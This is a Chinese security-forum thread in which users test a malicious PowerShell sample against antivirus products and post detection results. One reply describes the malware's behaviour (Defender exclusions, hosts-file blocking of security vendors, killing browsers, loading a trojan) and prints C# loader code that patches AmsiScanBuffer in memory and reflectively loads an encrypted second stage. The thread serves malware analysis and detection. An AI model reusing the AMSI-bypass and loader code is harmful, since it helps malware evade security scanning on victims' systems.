查看: 1155|回复: 14
收起左侧

[病毒样本] ps1

[复制链接]
xiaozhu009
发表于 前天 10:03 | 显示全部楼层 |阅读模式

评分

参与人数 1人气 +2 收起 理由
莒县小哥 + 2 版区有你更精彩: )

查看全部评分

图钉鱼
发表于 前天 14:36 | 显示全部楼层
本帖最后由 图钉鱼 于 2025-7-7 16:26 编辑

添加Windows Defender排除项,下载同伙运行,
修改系统 hosts 文件,屏蔽 ​100+ 个安全厂商域名/IP,
强制关闭主流浏览器进程(阻止用户浏览器求助或访问安全网站下载杀毒),
解密运行一个内存马~禁用AMSI功能后从脚本解析出一个Kryptik木马运行,除火绒外基本都可以查杀这个木马VirusTotal - File - ef30059583a58856fe4bfee6476e0ad6402462bd10c6bb27eda202fc9cc27e92

这个马又会下载另一个木马,套娃样本报告-微步在线云沙箱,新样本可以新开一贴了
内存马代码如下:
  1. public class Loader
  2. {
  3.     [DllImport("kernel32.dll")]
  4.     private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  5.    
  6.     [DllImport("kernel32.dll")]
  7.     private static extern IntPtr LoadLibrary(string dllName);
  8.    
  9.     public static void Main()
  10.     {
  11.         
  12.         IntPtr hMod = LoadLibrary("amsi.dll");
  13.         IntPtr asbAddr = GetProcAddress(hMod, "AmsiScanBuffer");
  14.         
  15.         // AMSI内存禁用
  16.         PatchMemory(asbAddr, new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 });
  17.         
  18.         // 从资源加载load(在脚本最后的编码中)
  19.         byte[] stage2 = ExtractResource("encrypted.bin");
  20.         Assembly.Load(Decrypt(stage2)).EntryPoint.Invoke(null, null);
  21.     }
  22.    
  23.     private static void PatchMemory(IntPtr address, byte[] patch)
  24.     {
  25.       
  26.         VirtualProtect(address, (uint)patch.Length,
  27.             0x40 /* PAGE_EXECUTE_READWRITE */, out uint oldProtect);
  28.         
  29.         // 写入
  30.         Marshal.Copy(patch, 0, address, patch.Length);
  31.         
  32.         
  33.         VirtualProtect(address, (uint)patch.Length, oldProtect, out _);
  34.     }
  35. }
复制代码











本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
1073328164
发表于 前天 10:26 | 显示全部楼层
迈克菲扫描 miss
munsimli
发表于 前天 10:55 | 显示全部楼层
本帖最后由 munsimli 于 2025-7-7 19:06 编辑

卡巴解壓與右鍵掃描不報,op已從原本clean改為Malware

https://opentip.kaspersky.com/53 ... /results?tab=upload
小玮
发表于 前天 11:31 | 显示全部楼层
MD扫描miss
awsl10000次
发表于 前天 11:34 | 显示全部楼层
过sophos intelix,奇安信情报沙箱,opentip;微步未知
vt 1/62
https://www.virustotal.com/gui/f ... 6c4d7d27-1751857908
莒县小哥
发表于 前天 11:48 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
453125415
发表于 前天 12:03 | 显示全部楼层
本帖最后由 453125415 于 2025-7-7 12:14 编辑

360
扫描miss
双击
时间        操作        说明        次数
2025-07-07 12:02:38        [已阻止]          进程创建        防护 1 次
详细描述:
进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
动作:进程创建
路径:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
风险文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
拦截补充描述:为了您的上网安全,如果您不认识此程序,请阻止此操作。

防护信息: AD|1, 10001|10, 60, 60||




啊松
发表于 前天 12:22 | 显示全部楼层
卡巴应该是防御成功了(6.21病毒库),pdm后冰盾没有拦截这个网页木马攻击






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
tony099
发表于 前天 12:31 | 显示全部楼层
本帖最后由 tony099 于 2025-7-7 13:33 编辑
啊松 发表于 2025-7-7 12:22
卡巴应该是防御成功了(6.21病毒库),pdm后冰盾没有拦截这个网页木马攻击

我上报一下,发个邮件——————————
13:30卡巴人工回复:

在附件中发现新的恶意软件。它的检测将包含在下一次更新中。
53974BED6F5945968D488A27C0584DB4312285898DEBC825543761AD6C4D7D27

-Trojan-Downloader.PowerShell.Agent.adu

GDHJDSYDH
发表于 前天 14:15 | 显示全部楼层
EIS扫描miss
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-9 12:06 , Processed in 0.127588 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表